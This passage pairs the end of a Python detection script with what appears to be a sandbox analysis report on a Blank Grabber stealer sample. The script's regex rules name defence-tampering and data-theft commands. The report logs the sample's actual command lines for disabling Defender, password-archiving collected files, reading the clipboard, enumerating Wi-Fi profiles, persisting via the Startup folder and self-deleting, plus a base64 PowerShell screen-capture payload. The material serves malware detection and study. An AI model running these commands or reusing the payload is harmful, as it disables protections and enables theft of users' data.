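def parse_events(blob: str) -> List[Tuple[int, str]]:
    """Split the constructed 'pid cmdline' records."""
    return [(int(pid), cmd) for pid, cmd in
            (line.split(None, 1) for line in blob.strip().splitlines())]


ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text. Reports often truncate
    the token, so trim to whole base64 quartets and whole UTF-16 code units
    instead of raising; a partial plaintext is still enough to classify."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    token = m.group(1)
    token = token[: len(token) - len(token) % 4]
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-le", errors="replace")


# Rules over the raw command line (names are this example's own labels).
RULES = {k: re.compile(v, re.I) for k, v in {
    "defender_protection_disabled":   r"Set-MpPreference\b.*-Disable\w*\s+\$true",
    "defender_exclusion_added":       r"Add-MpPreference\b.*-ExclusionPath",
    "defender_signatures_removed":    r"MpCmdRun\.exe\b.*-RemoveDefinitions",
    "startup_folder_reference":       r"\\Start Menu\\Programs\\StartUp\\",
    "ping_then_delete_self":          r"\bping\b.*\s-n\s+\d+.*&&\s*del\s",
    "rar_password_protected_archive": r"\brar\.exe\s+a\b.*\s-hp",
    "hosts_file_attrib_toggle":       r"\battrib\s+[+-]r\s+.*\\drivers\\etc\\hosts",
    "clipboard_read_via_powershell":  r"\bGet-Clipboard\b",
    "wifi_profile_enumeration":       r"\bnetsh\s+wlan\s+show\s+profile",
    "vm_fingerprint_via_wmic":        r"\bwmic\b.*\b(csproduct\s+get\s+uuid|win32_VideoController)\b",
    "encoded_powershell_command":     r"-EncodedCommand\s+[A-Za-z0-9+/=]{8,}",
}.items()}
# Rules over the decoded -EncodedCommand payload.
DECODED_RULES = {k: re.compile(v, re.I) for k, v in {
    "encoded_payload_is_csharp_herestring": r'@"\s+using\s+System\b',
    "encoded_payload_uses_system_drawing":  r"using\s+System\.Drawing\b",
}.items()}


def triage(events: List[Tuple[int, str]]) -> Dict[str, List[int]]:
    """Map each rule that fired to the PIDs it fired on."""
    hits: Dict[str, List[int]] = defaultdict(list)
    for pid, cmd in events:
        for name, rx in RULES.items():
            if rx.search(cmd):
                hits[name].append(pid)
        decoded = decode_encoded_command(cmd)
        for name, rx in DECODED_RULES.items():
            if decoded and rx.search(decoded):
                hits[name].append(pid)
    return dict(hits)


# Stages of the chain seen above: defence tampering, collection, cleanup.
# One stage alone is often admin noise; all three from one parent is not.
STAGES = (
    {"defender_protection_disabled", "defender_exclusion_added", "defender_signatures_removed"},
    {"rar_password_protected_archive", "clipboard_read_via_powershell", "wifi_profile_enumeration"},
    {"ping_then_delete_self", "hosts_file_attrib_toggle", "startup_folder_reference"},
)


def verdict(hits: Dict[str, List[int]]) -> str:
    fired = set(hits)
    stages = sum(1 for s in STAGES if s & fired)
    return {3: "malicious", 0: "benign"}.get(stages, "suspicious")


if __name__ == "__main__":
    h = triage(parse_events(EVENTS))
    for rule, pids in sorted(h.items()):
        print(f"{rule:38} {pids}")
    print("verdict:", verdict(h))
```

Two caveats when turning this into a real rule. First, PIDs are reused within the run (6472 and 6960 each appear twice in the tree, once as cmd.exe and once as a child), which is also why the "Rare Remote Thread Creation" match below shows WMIC.exe and cmd.exe with the same PID 6472; correlate on parent image plus time window, not on PID alone. Second, the `Set-MpPreference -Disable... $true` calls are blocked when Defender Tamper Protection is enabled, so a successful disable on a production host is a finding about that host's configuration as much as about the malware.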
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\_MEI73202\rarreg.key | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000003.2878432052.000000000838F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000004.00000002.2886083384.0000000007480000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000000.00000003.2051169917.00000000050F4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000000.00000003.2051169917.00000000050F6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
(first 5 of 7 entries shown)

              System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\KpHYfxnJs6.exe", ParentImage: C:\Users\user\Desktop\KpHYfxnJs6.exe, ParentProcessId: 7732, ParentProcessName: KpHYfxnJs6.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'", ProcessId: 7964, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\KpHYfxnJs6.exe", ParentImage: C:\Users\user\Desktop\KpHYfxnJs6.exe, ParentProcessId: 7732, ParentProcessName: KpHYfxnJs6.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7972, ProcessName: cmd.exe
Source: Process started; Author: @ROxPinTeddy; Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\KpHYfxnJs6.exe", ParentImage: C:\Users\user\Desktop\KpHYfxnJs6.exe, ParentProcessId: 7732, ParentProcessName: KpHYfxnJs6.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *", ProcessId: 6384, ProcessName: cmd.exe
Source: Threat created; Author: Perez Diego (@darkquassar), oscd.community; Data: EventID: 8, SourceImage: C:\Windows\SysWOW64\wbem\WMIC.exe, SourceProcessId: 6472, StartAddress: 7574D700, TargetImage: C:\Windows\SysWOW64\cmd.exe, TargetProcessId: 6472
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started; Author: Ilya Krestinichev; Data: Command: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe"", CommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\KpHYfxnJs6.exe", ParentImage: C:\Users\user\Desktop\KpHYfxnJs6.exe, ParentProcessId: 7732, ParentProcessName: KpHYfxnJs6.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe"", ProcessId: 2180, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\KpHYfxnJs6.exe, ProcessId: 7732, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUA
ZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process started, Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems), Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\KpHYfxnJs6.exe", ParentImage: C:\Users\user\Desktop\KpHYfxnJs6.exe, ParentProcessId: 7732, ParentProcessName: KpHYfxnJs6.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 4280, ProcessName: cmd.exe
              Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\KpHYfxnJs6.exe", ParentImage: C:\Users\user\Desktop\KpHYfxnJs6.exe, ParentProcessId: 7732, ParentProcessName: KpHYfxnJs6.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'", ProcessId: 7964, ProcessName: cmd.exe
              Source: File created, Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io, Data: EventID: 11, Image: C:\Users\user\Desktop\KpHYfxnJs6.exe, ProcessId: 7732, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr
              Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: EventID: 11, Image: C:\Users\user\Desktop\KpHYfxnJs6.exe, ProcessId: 7732, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Source: Process started, Author: frack113, Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: File created, Author: frack113, Data: EventID: 11, Image: C:\Users\user\Desktop\KpHYfxnJs6.exe, ProcessId: 7732, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr
              Source: File created, Author: frack113, Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7048, TargetFilename: C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline
              Source: Process started, Author: Timur Zinniatullin, E.M. Anhaus, oscd.community, Data: Command: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6384, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *, ProcessId: 2792, ProcessName: rar.exe
              Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7964, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe', ProcessId: 8108, ProcessName: powershell.exe

              Data Obfuscation

              Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

              Stealing of Sensitive Information

              Source: Process started, Author: Joe Security, Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\KpHYfxnJs6.exe", ParentImage: C:\Users\user\Desktop\KpHYfxnJs6.exe, ParentProcessId: 7732, ParentProcessName: KpHYfxnJs6.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7492, ProcessName: cmd.exe
              No Suricata rule has matched



              AV Detection

              Source: KpHYfxnJs6.exe, Virustotal: Detection: 43%
              Source: KpHYfxnJs6.exe, ReversingLabs: Detection: 42%
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
              Source: KpHYfxnJs6.exe, Joe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe, Code function: 109_2_00007FF6FAA3901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 109_2_00007FF6FAA3901C
              Source: KpHYfxnJs6.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2905394504.000000006F911000.00000020.00000001.01000000.00000007.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\python311.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2898642505.000000006C626000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.pdb source: powershell.exe, 00000046.00000002.2707327914.0000000004ACA000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: KpHYfxnJs6.exe, 00000004.00000002.2897142653.000000006C0A3000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: KpHYfxnJs6.exe, 00000004.00000002.2903601786.000000006F8DB000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2903162092.000000006F8A1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2896773038.000000006BEE2000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdbAA source: KpHYfxnJs6.exe, 00000004.00000002.2896773038.000000006BEE2000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2901778919.000000006F851000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_ssl.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2901169725.000000006F821000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_ctypes.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2904571313.000000006F8F1000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_hashlib.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2900426461.000000006F811000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2903601786.000000006F8DB000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2900045891.000000006F801000.00000040.00000001.01000000.00000014.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2895977031.000000006BE70000.00000040.00000001.01000000.00000015.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1q 5 Jul 2022built on: Thu Aug 18 20:09:02 2022 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: KpHYfxnJs6.exe, 00000004.00000002.2897142653.000000006C0A3000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_socket.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2902247843.000000006F861000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\sqlite3.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2898061015.000000006C181000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006D.00000000.2746843353.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp, rar.exe, 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_sqlite3.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2902609939.000000006F881000.00000040.00000001.01000000.0000000C.sdmp
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe, Code function: 109_2_00007FF6FAA446EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 109_2_00007FF6FAA446EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe, Code function: 109_2_00007FF6FAA3E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle, 109_2_00007FF6FAA3E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe, Code function: 109_2_00007FF6FAA888E0 FindFirstFileExA, 109_2_00007FF6FAA888E0

              Networking

              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 3
              Source: unknown, DNS query: name: ip-api.com
              Source: unknown, DNS query: name: ip-api.com
              Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic, HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1, Host: ip-api.com, Accept-Encoding: identity, User-Agent: python-urllib3/2.3.0
              Source: global traffic, HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1, Host: ip-api.com, Accept-Encoding: identity, User-Agent: python-urllib3/2.3.0
              Source: KpHYfxnJs6.exe, 00000004.00000002.2894662678.00000000080D0000.00000004.00001000.00020000.00000000.sdmp, String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
